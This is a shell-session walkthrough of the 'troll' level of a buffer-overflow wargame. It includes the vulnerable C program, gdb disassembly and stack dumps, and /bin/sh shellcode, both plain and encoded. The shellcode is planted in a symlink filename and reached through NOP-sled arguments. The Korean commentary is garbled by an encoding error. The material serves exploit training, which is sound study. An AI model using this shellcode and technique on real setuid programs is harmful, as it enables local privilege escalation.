[orge@localhost orge]$ ls -al
total 52
drwx------    2 orge     orge         4096 Jul  3 07:00 .
drwxr-xr-x   25 root     root         4096 Mar 30  2010 ..
-rw-------    1 orge     orge           23 Jul  3 07:00 .bash_history
-rw-r--r--    1 orge     orge           24 Feb 27  2010 .bash_logout
-rw-r--r--    1 orge     orge          230 Feb 27  2010 .bash_profile
-rw-r--r--    1 orge     orge          124 Feb 27  2010 .bashrc
-rwxr-xr-x    1 orge     orge          333 Feb 27  2010 .emacs
-rw-r--r--    1 orge     orge         3394 Feb 27  2010 .screenrc
-rwsr-sr-x    1 troll    troll       12693 Mar  1  2010 troll
-rw-r--r--    1 root     root          772 Mar 29  2010 troll.c
[orge@localhost orge]$ clear
[orge@localhost orge]$ bash2 
[orge@localhost orge]$ ls -al
total 52
drwx------    2 orge     orge         4096 Jul  3 07:00 .
drwxr-xr-x   25 root     root         4096 Mar 30  2010 ..
-rw-------    1 orge     orge           23 Jul  3 07:00 .bash_history
-rw-r--r--    1 orge     orge           24 Feb 27  2010 .bash_logout
-rw-r--r--    1 orge     orge          230 Feb 27  2010 .bash_profile
-rw-r--r--    1 orge     orge          124 Feb 27  2010 .bashrc
-rwxr-xr-x    1 orge     orge          333 Feb 27  2010 .emacs
-rw-r--r--    1 orge     orge         3394 Feb 27  2010 .screenrc
-rwsr-sr-x    1 troll    troll       12693 Mar  1  2010 troll
-rw-r--r--    1 root     root          772 Mar 29  2010 troll.c
[orge@localhost orge]$ cat troll.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - troll
        - check argc + argv hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
	char buffer[40];
	int i;

	// here is changed
	if(argc != 2){
		printf("argc must be two!\n");
		exit(0);
	}

	// egghunter 
	for(i=0; environ[i]; i++)
		memset(environ[i], 0, strlen(environ[i]));

	if(argv[1][47] != '\xbf')
	{
		printf("stack is still your friend.\n");
		exit(0);
	}

	// check the length of argument
	if(strlen(argv[1]) > 48){
		printf("argument is too long!\n");
		exit(0);
	}

	strcpy(buffer, argv[1]); 
	printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);

	// one more!
	memset(argv[1], 0, strlen(argv[1]));
}









Äڵ带 º¸¾ÆÇÏ´Ï argc ÀÎÀÚ°ªÀº 2°³°¡ µÇ¾î¾ßÇÏ°í
argv[1]Àº ¸¶Áö¸·¿¡ 0À¸·Î ÃʱâÈ­µÈ´Ù.
...ÆÄÀÏ À̸§ ÀÚü¸¦ ÆäÀ̷εå·Î ¸¸µé¸é?
¤·¤» µÈ´Ù...






[orge@localhost orge]$ mkdir tmp
[orge@localhost orge]$ cp troll tmp
[orge@localhost orge]$ cd tmp
[orge@localhost tmp]$ ls
troll
[orge@localhost tmp]$ ln -s troll `python -c 'print "\x90"*200+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
ln: cannot create symbolic link `1??h//shh/bin???¡Æ
                                                ?' to `troll': No such file or directory
[orge@localhost tmp]$ ls -al
total 24
drwxrwxr-x    2 orge     orge         4096 Jul  7 04:09 .
drwx------    3 orge     orge         4096 Jul  7 04:09 ..
-rwsr-sr-x    1 orge     orge        12693 Jul  7 04:09 troll
[orge@localhost tmp]$ ln -s ./troll `python -c 'print "\x90"*200+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
ln: cannot create symbolic link `1??h//shh/bin???¡Æ
                                                ?' to `./troll': No such file or directory
[orge@localhost tmp]$ ls
troll
[orge@localhost tmp]$ ln -s troll `python -c 'print "\x90"*200+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
ln: cannot create symbolic link `1??h//shh/bin???¡Æ
                                                ?' to `troll': No such file or directory
[orge@localhost tmp]$ ln -s troll `python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`








óÀ½¿£ 25¹ÙÀÌÆ® ½©Äڵ尡 ¿Ö ÆÄÀÏ À̸§¿¡ ³ÖÀ¸¸é ÀνÄÀÌ ¾È µÇ´ÂÁö
Çì¸Å´Ù°¡ ¿øÀÎÀ» ã¾Ò³Â´Ù.
±×°ÍÀº '\x2f'°ªÀº ½½·¡½¬(/)¸¦ ÀǹÌÇϴµ¥
ÀÌ°ÍÀº ¸®´ª½º ÆÄÀÏ À§Ä¡ÀÇ °æ·Î¸¦ ÀǹÌÇϱ⠶§¹®¿¡
\x2f°ªÀ» ³ÖÁö ¸»¾Æ¾ß µÇ´Â °ÍÀÌ´Ù.

¾Æ·¡´Â \x2f°¡ ¾ø´Â ½©ÄÚµå´Ù.

\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81






[orge@localhost tmp]$ ls    
troll
?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????1?2?l?y?????—þy2i00tii0cjo?????? 
[orge@localhost tmp]$ gdb -q `python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
(gdb) set disassembly intel
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>:	push   %ebp
0x8048501 <main+1>:	mov    %ebp,%esp
0x8048503 <main+3>:	sub    %esp,44
0x8048506 <main+6>:	cmp    DWORD PTR [%ebp+8],2
0x804850a <main+10>:	je     0x8048523 <main+35>
0x804850c <main+12>:	push   0x8048690
0x8048511 <main+17>:	call   0x8048410 <printf>
0x8048516 <main+22>:	add    %esp,4
0x8048519 <main+25>:	push   0
0x804851b <main+27>:	call   0x8048420 <exit>
0x8048520 <main+32>:	add    %esp,4
0x8048523 <main+35>:	nop    
0x8048524 <main+36>:	mov    DWORD PTR [%ebp-44],0x0
0x804852b <main+43>:	nop    
0x804852c <main+44>:	lea    %esi,[%esi*1]
0x8048530 <main+48>:	mov    %eax,DWORD PTR [%ebp-44]
0x8048533 <main+51>:	lea    %edx,[%eax*4]
0x804853a <main+58>:	mov    %eax,%ds:0x80497cc
0x804853f <main+63>:	cmp    DWORD PTR [%eax+%edx],0
0x8048543 <main+67>:	jne    0x8048547 <main+71>
0x8048545 <main+69>:	jmp    0x8048587 <main+135>
0x8048547 <main+71>:	mov    %eax,DWORD PTR [%ebp-44]
0x804854a <main+74>:	lea    %edx,[%eax*4]
0x8048551 <main+81>:	mov    %eax,%ds:0x80497cc
0x8048556 <main+86>:	mov    %edx,DWORD PTR [%eax+%edx]
0x8048559 <main+89>:	push   %edx
0x804855a <main+90>:	call   0x80483f0 <strlen>
0x804855f <main+95>:	add    %esp,4
0x8048562 <main+98>:	mov    %eax,%eax
0x8048564 <main+100>:	push   %eax
0x8048565 <main+101>:	push   0
0x8048567 <main+103>:	mov    %eax,DWORD PTR [%ebp-44]
0x804856a <main+106>:	lea    %edx,[%eax*4]
0x8048571 <main+113>:	mov    %eax,%ds:0x80497cc
0x8048576 <main+118>:	mov    %edx,DWORD PTR [%eax+%edx]
0x8048579 <main+121>:	push   %edx
0x804857a <main+122>:	call   0x8048430 <memset>
0x804857f <main+127>:	add    %esp,12
0x8048582 <main+130>:	inc    DWORD PTR [%ebp-44]
0x8048585 <main+133>:	jmp    0x8048530 <main+48>
0x8048587 <main+135>:	mov    %eax,DWORD PTR [%ebp+12]
0x804858a <main+138>:	add    %eax,4
0x804858d <main+141>:	mov    %edx,DWORD PTR [%eax]
0x804858f <main+143>:	add    %edx,47
0x8048592 <main+146>:	cmp    BYTE PTR [%edx],0xbf
0x8048595 <main+149>:	je     0x80485b0 <main+176>
0x8048597 <main+151>:	push   0x80486a3
0x804859c <main+156>:	call   0x8048410 <printf>
0x80485a1 <main+161>:	add    %esp,4
0x80485a4 <main+164>:	push   0
---Type <return> to continue, or q <return> to quit---
0x80485a6 <main+166>:	call   0x8048420 <exit>
0x80485ab <main+171>:	add    %esp,4
0x80485ae <main+174>:	mov    %esi,%esi
0x80485b0 <main+176>:	mov    %eax,DWORD PTR [%ebp+12]
0x80485b3 <main+179>:	add    %eax,4
0x80485b6 <main+182>:	mov    %edx,DWORD PTR [%eax]
0x80485b8 <main+184>:	push   %edx
0x80485b9 <main+185>:	call   0x80483f0 <strlen>
0x80485be <main+190>:	add    %esp,4
0x80485c1 <main+193>:	mov    %eax,%eax
0x80485c3 <main+195>:	cmp    %eax,48
0x80485c6 <main+198>:	jbe    0x80485e0 <main+224>
0x80485c8 <main+200>:	push   0x80486c0
0x80485cd <main+205>:	call   0x8048410 <printf>
0x80485d2 <main+210>:	add    %esp,4
0x80485d5 <main+213>:	push   0
0x80485d7 <main+215>:	call   0x8048420 <exit>
0x80485dc <main+220>:	add    %esp,4
0x80485df <main+223>:	nop    
0x80485e0 <main+224>:	mov    %eax,DWORD PTR [%ebp+12]
0x80485e3 <main+227>:	add    %eax,4
0x80485e6 <main+230>:	mov    %edx,DWORD PTR [%eax]
0x80485e8 <main+232>:	push   %edx
0x80485e9 <main+233>:	lea    %eax,[%ebp-40]
0x80485ec <main+236>:	push   %eax
0x80485ed <main+237>:	call   0x8048440 <strcpy>
0x80485f2 <main+242>:	add    %esp,8
0x80485f5 <main+245>:	lea    %eax,[%ebp-40]
0x80485f8 <main+248>:	push   %eax
0x80485f9 <main+249>:	push   0x80486d7
0x80485fe <main+254>:	call   0x8048410 <printf>
0x8048603 <main+259>:	add    %esp,8
0x8048606 <main+262>:	push   40
0x8048608 <main+264>:	push   0
0x804860a <main+266>:	lea    %eax,[%ebp-40]
0x804860d <main+269>:	push   %eax
0x804860e <main+270>:	call   0x8048430 <memset>
0x8048613 <main+275>:	add    %esp,12
0x8048616 <main+278>:	mov    %eax,DWORD PTR [%ebp+12]
0x8048619 <main+281>:	add    %eax,4
0x804861c <main+284>:	mov    %edx,DWORD PTR [%eax]
0x804861e <main+286>:	push   %edx
0x804861f <main+287>:	call   0x80483f0 <strlen>
0x8048624 <main+292>:	add    %esp,4
0x8048627 <main+295>:	mov    %eax,%eax
0x8048629 <main+297>:	push   %eax
0x804862a <main+298>:	push   0
0x804862c <main+300>:	mov    %eax,DWORD PTR [%ebp+12]
0x804862f <main+303>:	add    %eax,4
0x8048632 <main+306>:	mov    %edx,DWORD PTR [%eax]
0x8048634 <main+308>:	push   %edx
---Type <return> to continue, or q <return> to quit---
0x8048635 <main+309>:	call   0x8048430 <memset>
0x804863a <main+314>:	add    %esp,12
0x804863d <main+317>:	leave  
0x804863e <main+318>:	ret    
0x804863f <main+319>:	nop    
End of assembler dump.
(gdb) r `python -c 'print "\x90"*44+"\xbf"*4'`
Starting program: /home/orge/tmp/?1?2ly???yyy2i00tii0cjo??
                                                            ? `python -c 'print "\x90"*44+"\xbf"*4'`
Xshell¢¯¢¯¢¯¢¯

Program received signal SIGSEGV, Segmentation fault.
0xbfbfbfbf in ?? ()
(gdb) b *main+237                             
Breakpoint 1 at 0x80485ed
(gdb) r `python -c 'print "\x90"*44+"\xbf"*4'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/orge/tmp/?1?2ly???yyy2i00tii0cjo??
                                                            ? `python -c 'print "\x90"*44+"\xbf"*4'`
Xshell
Breakpoint 1, 0x80485ed in main ()
(gdb) x/512x $esp
0xbffff8b4:	0xbffff8c0	0xbffffb35	0x00000017	0xbffff8e8
0xbffff8c4:	0x4000a970	0x400f855b	0x080496fc	0x4000ae60
0xbffff8d4:	0xbffff934	0xbffff8e8	0x080484eb	0x080496e8
0xbffff8e4:	0x080496fc	0xbffff908	0x400309cb	0x00000002
0xbffff8f4:	0xbffff934	0xbffff940	0x40013868	0x00000002
0xbffff904:	0x08048450	0x00000000	0x08048471	0x08048500
0xbffff914:	0x00000002	0xbffff934	0x08048390	0x0804866c
0xbffff924:	0x4000ae60	0xbffff92c	0x40013e90	0x00000002
0xbffff934:	0xbffffa2d	0xbffffb35	0x00000000	0xbffffb66
0xbffff944:	0xbffffb88	0xbffffb92	0xbffffba0	0xbffffbbf
0xbffff954:	0xbffffbcc	0xbffffbe3	0xbffffbfd	0xbffffc1c
0xbffff964:	0xbffffc27	0xbffffc35	0xbffffc75	0xbffffc87
0xbffff974:	0xbffffc97	0xbffffcac	0xbffffcbc	0xbffffcc6
0xbffff984:	0xbffffce2	0xbffffcfa	0xbffffd05	0xbffffd16
0xbffff994:	0xbffffd29	0xbffffd31	0x00000000	0x00000003
0xbffff9a4:	0x08048034	0x00000004	0x00000020	0x00000005
0xbffff9b4:	0x00000006	0x00000006	0x00001000	0x00000007
0xbffff9c4:	0x40000000	0x00000008	0x00000000	0x00000009
0xbffff9d4:	0x08048450	0x0000000b	0x000001fb	0x0000000c
0xbffff9e4:	0x000001fb	0x0000000d	0x000001fb	0x0000000e
0xbffff9f4:	0x000001fb	0x00000010	0x0febfbff	0x0000000f
0xbffffa04:	0xbffffa28	0x00000000	0x00000000	0x00000000
0xbffffa14:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffa24:	0x00000000	0x36383669	0x6f682f00	0x6f2f656d
0xbffffa34:	0x2f656772	0x2f706d74	0x90909090	0x90909090
0xbffffa44:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffa54:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffa64:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffa74:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffa84:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffa94:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffaa4:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffab4:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffac4:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffad4:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffae4:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffaf4:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb04:	0x315e11eb	0x8032b1c9	0x01ff0e6c	0x7501e980
0xbffffb14:	0xe805ebf6	0xffffffea	0x6951c132	0x69743030
0xbffffb24:	0x6a633069	0x51e48a6f	0x9ae28a54	0x81ce0cb1
0xbffffb34:	0x90909000	0x90909090	0x90909090	0x90909090
0xbffffb44:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb54:	0x90909090	0x90909090	0x90909090	0xbfbfbf90
0xbffffb64:	0x000000bf	0x00000000	0x00000000	0x00000000
0xbffffb74:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb84:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb94:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffba4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbb4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbc4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbd4:	0x00000000	0x00000000	0x00000000	0x00000000
---Type <return> to continue, or q <return> to quit---
0xbffffbe4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbf4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc04:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc14:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc24:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc34:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc44:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc54:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc64:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc74:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc84:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc94:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffca4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcb4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcc4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcd4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffce4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcf4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd04:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd14:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd24:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd34:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd44:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd54:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd64:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd74:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd84:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffd94:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffda4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffdb4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffdc4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffdd4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffde4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffdf4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe04:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe14:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe24:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe34:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe44:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe54:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe64:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe74:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe84:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffe94:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffea4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffeb4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffec4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffed4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffee4:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffef4:	0x6d6f682f	0x726f2f65	0x742f6567	0x902f706d
0xbfffff04:	0x90909090	0x90909090	0x90909090	0x90909090
---Type <return> to continue, or q <return> to quit---
0xbfffff14:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffff24:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffff34:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffff44:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffff54:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffff64:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffff74:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffff84:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffff94:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffffa4:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffffb4:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffffc4:	0x90909090	0xeb909090	0xc9315e11	0x6c8032b1
0xbfffffd4:	0x8001ff0e	0xf67501e9	0xeae805eb	0x32ffffff
0xbfffffe4:	0x306951c1	0x69697430	0x6f6a6330	0x5451e48a
0xbffffff4:	0xb19ae28a	0x0081ce0c	0x00000000	Cannot access memory at address 0xc0000000
(gdb) q
The program is running.  Exit anyway? (y or n) y
[orge@localhost tmp]$ cd ..
[orge@localhost orge]$ ls
tmp  troll  troll.c
[orge@localhost orge]$ ln -s troll `python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost orge]$ ./`python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"' `python -c 'print "\x90"*44+"\xa4\xff\xff\xbf"'`
> 
[orge@localhost orge]$ ./`python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"' `python -c 'print "\x90"*44+"\xa4\xff\xff\xbf"'`
> 
[orge@localhost orge]$ ./`python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"' `python -c 'print "\x90"*44+"\xa4\xff\xff\xbf"'`
> my-pass
> 
[orge@localhost orge]$ ./`python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\x90"*44+"\xa4\xff\xff\xbf"'`
my-pass
¢´yy¢¯
Segmentation fault
euid = 507
[?????????????]
[orge@localhost orge]$ ./`python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\x90"*44+"\xa4\xff\xff\xbf"'`
¢´yy¢¯
Segmentation fault





µÎ¹ø° °íºñ°¡ ¿Ô´Ù...
ÇÊÀڴ Ȥ½Ã³ª ÆÄÀÏ À̸§(½©ÄÚµå) µÚ¿¡ \x90(nop)ÀÌ ¾ø¾î¼­
±×·±°¡ À¯ÃßÇß°í ±× À¯Ãß°¡ ¸Â¾Æ ¶³¾îÁ³´Ù.






NOP Sled¶õ ¹«¾ùÀϱî?
"NOP ¸í·É¾î(¾Æ¹«°Íµµ ¾È ÇÏ´Â ¸í·É¾î)"¸¦ ¹Ì²ô·³Æ²Ã³·³ Âß ±ò¾ÆµÎ°í,
±× À§¿¡ shellcode¸¦ ¹èÄ¡ÇØ, return address°¡ Á¤È®È÷ ¸ÂÁö ¾Ê¾Æµµ
shellcode±îÁö ¹Ì²ô·¯Áöµí µµ´ÞÇÏ°Ô ¸¸µå´Â ±â¹ý"

±¸Á¶Àû °³³äÀº...
¹öÆÛ ¿À¹öÇ÷οì exploitÀº ´ëü·Î ÀÌ·± ±¸Á¶¸¦ °¡Áö°Ô µÈ´Ù.

[ NOP SLED ][ Shellcode ][ Padding ][ Return Address ]




±Ùµ¥ ½ÇÁ¦·Î´Â ÀÌ·¸°Ô ¸Þ¸ð¸®¿¡ ½×ÀδÙ.


|--------------------------|
|   NOP sled (ex. \x90)   |
|--------------------------|
|     Shellcode           |
|--------------------------|
|     Saved EBP           |
|--------------------------|
|   Return Address (EIP)  |
|--------------------------|


nopÀÇ ¸ñÀûÀº...
EIP(Return Address) ¸¦ Á¤È®È÷ shellcode À§Ä¡¿¡ ¸ÂÃß´Â °Ç ¾î·Æ´Ù.
±×·¡¼­ ±× "±Ùó" ¾îµò°¡¿¡¸¸ Á¡ÇÁÇصµ ¼º°ø½ÃÅ°·Á°í,
shellcode ¾Õ¿¡ NOP¸¦ ÀÜ¶à ±ò¾ÆµÎ´Â °ÍÀÌ´Ù.
EIP°¡ NOP ¾È ¾îµò°¡·Î ¶³¾îÁö¸é
NOP°¡ ¿¬´Þ¾Æ ½ÇÇàµÇ¸é¼­ °á±¹ shellcode¿¡ µµ´ÞÇÏ°Ô µÈ´Ù.





[orge@localhost orge]$ ln -s troll `python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"\x90"*30'`
ln: ?1?2ly???yyy2i00tii0cjo??
                               ?: File name too long
[orge@localhost orge]$ cd tmp
[orge@localhost tmp]$ ls
troll
?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????1?2?l?y?????—þy2i00tii0cjo?????? 
[orge@localhost tmp]$ ln -s troll `python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"\x90"*100'`
[orge@localhost tmp]$ gdb -q ./`python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"\x90"*100'`
(gdb) set disassembly inte
(gdb) set disassembly intel
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>:	push   %ebp
0x8048501 <main+1>:	mov    %ebp,%esp
0x8048503 <main+3>:	sub    %esp,44
0x8048506 <main+6>:	cmp    DWORD PTR [%ebp+8],2
0x804850a <main+10>:	je     0x8048523 <main+35>
0x804850c <main+12>:	push   0x8048690
0x8048511 <main+17>:	call   0x8048410 <printf>
0x8048516 <main+22>:	add    %esp,4
0x8048519 <main+25>:	push   0
0x804851b <main+27>:	call   0x8048420 <exit>
0x8048520 <main+32>:	add    %esp,4
0x8048523 <main+35>:	nop    
0x8048524 <main+36>:	mov    DWORD PTR [%ebp-44],0x0
0x804852b <main+43>:	nop    
0x804852c <main+44>:	lea    %esi,[%esi*1]
0x8048530 <main+48>:	mov    %eax,DWORD PTR [%ebp-44]
0x8048533 <main+51>:	lea    %edx,[%eax*4]
0x804853a <main+58>:	mov    %eax,%ds:0x80497cc
0x804853f <main+63>:	cmp    DWORD PTR [%eax+%edx],0
0x8048543 <main+67>:	jne    0x8048547 <main+71>
0x8048545 <main+69>:	jmp    0x8048587 <main+135>
0x8048547 <main+71>:	mov    %eax,DWORD PTR [%ebp-44]
0x804854a <main+74>:	lea    %edx,[%eax*4]
0x8048551 <main+81>:	mov    %eax,%ds:0x80497cc
0x8048556 <main+86>:	mov    %edx,DWORD PTR [%eax+%edx]
0x8048559 <main+89>:	push   %edx
0x804855a <main+90>:	call   0x80483f0 <strlen>
0x804855f <main+95>:	add    %esp,4
0x8048562 <main+98>:	mov    %eax,%eax
0x8048564 <main+100>:	push   %eax
0x8048565 <main+101>:	push   0
0x8048567 <main+103>:	mov    %eax,DWORD PTR [%ebp-44]
0x804856a <main+106>:	lea    %edx,[%eax*4]
0x8048571 <main+113>:	mov    %eax,%ds:0x80497cc
0x8048576 <main+118>:	mov    %edx,DWORD PTR [%eax+%edx]
0x8048579 <main+121>:	push   %edx
0x804857a <main+122>:	call   0x8048430 <memset>
0x804857f <main+127>:	add    %esp,12
0x8048582 <main+130>:	inc    DWORD PTR [%ebp-44]
0x8048585 <main+133>:	jmp    0x8048530 <main+48>
0x8048587 <main+135>:	mov    %eax,DWORD PTR [%ebp+12]
0x804858a <main+138>:	add    %eax,4
0x804858d <main+141>:	mov    %edx,DWORD PTR [%eax]
0x804858f <main+143>:	add    %edx,47
0x8048592 <main+146>:	cmp    BYTE PTR [%edx],0xbf
0x8048595 <main+149>:	je     0x80485b0 <main+176>
0x8048597 <main+151>:	push   0x80486a3
0x804859c <main+156>:	call   0x8048410 <printf>
0x80485a1 <main+161>:	add    %esp,4
0x80485a4 <main+164>:	push   0
